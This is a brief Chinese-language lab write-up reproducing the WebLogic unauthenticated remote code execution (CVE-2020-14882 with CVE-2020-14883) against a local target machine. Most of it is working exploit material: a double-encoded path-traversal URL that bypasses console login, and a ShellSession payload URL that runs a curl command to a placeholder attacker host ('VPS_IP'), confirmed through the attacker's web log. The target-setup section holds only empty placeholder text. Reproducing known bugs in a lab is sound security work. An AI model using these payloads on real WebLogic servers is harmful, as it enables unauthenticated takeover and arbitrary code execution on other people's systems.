前言
远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
一、启动靶机
在这里插入代码片
在这里插入代码片
二、漏洞利用
靶机搭建成功
http://192.168.150.146:7001/console/login/LoginForm.jsp
1、访问如下URL,即可绕过身份验证,进入后台
URL:
http://192.168.150.146:7001/console/images/%252E%252E%252Fconsole.portal
?_nfpb=true
&_pageLabel=AppDeploymentsControlPage
&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
2、命令执行
http://192.168.150.146:7001/console/images/%252E%252E%252Fconsole.portal
?_nfpb=true
&_pageLabel=HomePage1
&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27curl http://VPS_IP/Hacker%27);%22)
三、检验
在VPS上的apache日志有靶机的请求记录。
tail -n 1 -f /var/log/apache2/access.log
参考:
https://www.cnblogs.com/hxlinux/p/14723721.html